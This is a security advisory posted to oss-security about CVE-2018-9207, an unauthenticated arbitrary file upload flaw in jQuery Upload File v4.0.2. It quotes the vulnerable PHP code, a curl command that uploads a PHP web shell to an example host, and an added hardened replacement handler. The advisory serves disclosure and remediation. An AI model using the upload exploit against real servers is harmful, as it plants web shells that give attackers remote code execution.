
List:       oss-security
Subject:    [oss-security] Arbitrary file upload vulnerability in jQuery Upload File v4.0.2
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2018-11-20 22:07:09
Message-ID: 0677039D-F0D3-4CE6-98B1-7D688CBBC375 () me ! com

Title:  Arbitrary file upload vulnerability in Hayageek jQuery Upload File v4.0.2
Author:  Larry W. Cashdollar, @_larry0
Date:  2018-11-02
CVE-ID:  CVE-2018-9207
CWE:  CWE-434 Unrestricted Upload of File with Dangerous Type (arbitrary file upload)
Download Site:  http://hayageek.com/docs/jquery-upload-file.php
Vendor:  Hayageek
Vendor Notified:  2018-11-02
Vendor Contact:  hayageek@gmail.com
Advisory:  http://www.vapidlabs.com/advisory.php?v=206

Description:  The jQuery Upload File plugin provides multiple file uploads with a progress bar. It works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.

Vulnerability:
The code in https://github.com/hayageek/jquery-upload-file/blob/master/php/upload.php performs no authentication and no validation of the uploaded file's name or type, so any unauthenticated user can upload an executable file (for example a .php script) into the uploads/ directory if it exists. The client-supplied file name is passed straight to move_uploaded_file():

    if(!is_array($_FILES["myfile"]["name"])) //single file
    {
        $fileName = $_FILES["myfile"]["name"];
        move_uploaded_file($_FILES["myfile"]["tmp_name"],$output_dir.$fileName);
        $ret[]= $fileName;
    }
    else //Multiple files, file[]
    {
        $fileCount = count($_FILES["myfile"]["name"]);
        for($i=0; $i < $fileCount; $i++)
        {
            $fileName = $_FILES["myfile"]["name"][$i];
            move_uploaded_file($_FILES["myfile"]["tmp_name"][$i],$output_dir.$fileName);
            $ret[]= $fileName;
        }
    }

Exploit Code:
$ curl -F "myfile=@shell.php" "http://example.com/jquery-upload-file/php/upload.php"
["shell.php"]

The JSON response is the list of stored file names that upload.php echoes back. Here shell.php is https://github.com/lcashdol/shittyshell/blob/master/shittyshell.php

The shell is then reachable at http://example.com/jquery-upload-file/php/uploads/shell.php
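A hardened replacement for the upload.php handler quoted in the Vulnerability section, added here as an example; it is not code from Hayageek or the jquery-upload-file project. It assumes a session-based login that sets $_SESSION['user_id'] (a hypothetical name), an allowlist of image and PDF types, and that the web server has script execution disabled for uploads/. With it, the curl request above is rejected on the .php extension before move_uploaded_file() is ever reached, and even an allowed file is stored under a server-chosen name rather than the client's.

```php
<?php
// Added example, not the project's code. Hardened handler for the same
// "myfile" / "myfile[]" form field that jquery-upload-file posts.
// Assumptions: a login sets $_SESSION['user_id'] (hypothetical name), and
// uploads/ has PHP execution disabled at the web-server level.
session_start();

// 1. Require authentication: the original handler serves anyone.
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit(json_encode(['error' => 'authentication required']));
}

$output_dir = __DIR__ . '/uploads/';   // same target directory as the original
$allowed = [                            // allowlist: extension => expected MIME type
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];
$max_bytes = 5 * 1024 * 1024;

/**
 * Validate one uploaded file and store it under a server-chosen name.
 * Returns the stored name, or throws RuntimeException on rejection.
 */
function store_upload(string $tmp, string $client_name, int $error, int $size,
                      string $output_dir, array $allowed, int $max_bytes): string
{
    if ($error !== UPLOAD_ERR_OK) {
        throw new RuntimeException("upload error $error");
    }
    // Only accept a file PHP itself received for this request.
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($size > $max_bytes) {
        throw new RuntimeException('file too large');
    }
    // 2. Extension allowlist on the client name; basename() drops any path part.
    $ext = strtolower(pathinfo(basename($client_name), PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException("extension .$ext not allowed");
    }
    // 3. Content check: sniff the MIME type from the bytes, not from client headers.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmp);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    // 4. Server-chosen name: the client name never reaches the filesystem, so
    //    shell.php, double extensions or .htaccess cannot be planted.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, $output_dir . $stored)) {
        throw new RuntimeException('could not store file');
    }
    chmod($output_dir . $stored, 0644);   // never executable
    return $stored;
}

if (!isset($_FILES['myfile'])) {
    http_response_code(400);
    exit(json_encode(['error' => 'no file']));
}

$f = $_FILES['myfile'];
// Normalise the single-file and myfile[] cases into one list, as the original does;
// a scalar cast to array becomes [0 => value], so the indices line up.
$names = (array) $f['name'];
$tmps  = (array) $f['tmp_name'];
$errs  = (array) $f['error'];
$sizes = (array) $f['size'];

$ret = [];
try {
    foreach ($names as $i => $client_name) {
        $ret[] = store_upload($tmps[$i], $client_name, $errs[$i], $sizes[$i],
                              $output_dir, $allowed, $max_bytes);
    }
} catch (RuntimeException $e) {
    http_response_code(400);
    exit(json_encode(['error' => $e->getMessage()]));
}

header('Content-Type: application/json');
echo json_encode($ret);   // e.g. ["3f2a...c9.png"], the server-chosen names
```

The checks are layered on purpose: the MIME sniff alone can be fooled by polyglot files, so the decisive controls are that only allowlisted extensions are ever written, that the stored name is generated server-side, and that the web server does not execute scripts from uploads/ (in Apache, for example, a per-directory `php_flag engine off` or `RemoveHandler .php`). The client sees the JSON list of stored names just as with the original handler, so the plugin's front end keeps working.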

